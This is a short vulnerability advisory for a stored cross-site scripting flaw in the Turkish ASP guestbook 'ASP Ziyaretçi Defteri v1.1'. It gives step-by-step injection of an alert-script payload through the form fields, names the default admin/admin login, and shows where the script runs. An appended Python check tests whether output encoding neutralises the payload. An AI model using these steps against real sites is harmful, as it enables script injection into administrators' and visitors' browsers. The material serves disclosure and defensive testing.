ASP Ziyaretçi Defteri version 1.1 suffers from a cross-site scripting vulnerability.
ASP Ziyaretçi Defteri v1.1 (tr) XSS Vulnerability
#Software: ASP Ziyaretçi Defteri v1.1 (tr)
#download: http://www.aspindir.com/goster/4882
#demo: http://www.hiddenchest.com/kodlarim/ziyaret/
#Found By: GeFORC3 ( G3 )
#Exploit:
1- http://www.example.com/ziyaret/mesaj_formu.asp
Isim (name): <script>alert("G3");</script>
E-posta (e-mail): <script>alert("G3");</script>
Mesajiniz (your message): <script>alert("G3");</script>
Press the "Gönder" (send) button.
2-
Yönetici paneli (admin panel):
http://www.example.com/ziyaret/default.asp (default user:admin pass:admin)
Press the "gir" (enter) button.
http://www.example.com/default.asp?islem=login --> the XSS code runs
This XSS works in the Yönetici Paneli (admin panel) of the ASP Ziyaretçi Defteri v1.1 (tr) script.
If the admin approves (activates) your message, the XSS code also runs on the main page of ASP Ziyaretçi Defteri v1.1 (the guestbook):
http://example.com/ziyaret/ziyaretci_mesajlari.asp
WwW.GeFORC3.Org | WwW.HeykirBlog.Org | WwW.NetKaBus.Com
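
The issue described above is a stored value reaching two HTML views (the admin panel and the public message page) without output encoding. The following Python check is an added example, not code from the advisory or from the guestbook: it renders a constructed entry with and without encoding and parses the result for active content. The row markup and all function names are assumptions; in classic ASP the corresponding output-side call is Server.HTMLEncode.

```python
import html
from html.parser import HTMLParser

# Constructed submission: the advisory's test string in all three form fields.
PAYLOAD = '<script>alert("G3");</script>'
FIELDS = ("Isim", "E-posta", "Mesajiniz")
ENTRY = {name: PAYLOAD for name in FIELDS}


def render_row(entry, encode):
    """Hypothetical stand-in for the admin panel / ziyaretci_mesajlari.asp row.

    The real markup is not shown in the advisory; only the encode step matters.
    """
    cells = []
    for name in FIELDS:
        value = entry.get(name, "")
        if encode:
            value = html.escape(value, quote=True)  # encode at output time
        cells.append("<td>" + value + "</td>")
    return "<tr>" + "".join(cells) + "</tr>"


class ActiveContentFinder(HTMLParser):
    """Collects tags and attributes in rendered markup that can run script."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe", "object", "embed"):
            self.findings.append(tag)
        for name, value in attrs:
            scheme = (value or "").strip().lower()
            if name.startswith("on") or scheme.startswith("javascript:"):
                self.findings.append(tag + "@" + name)


def active_content(markup):
    """Return the list of script-capable constructs a browser would parse."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    print("unencoded:", active_content(render_row(ENTRY, encode=False)))
    print("encoded:  ", active_content(render_row(ENTRY, encode=True)))
```

Run as a regression test against each view that displays visitor input, since the same stored entry is rendered in more than one place.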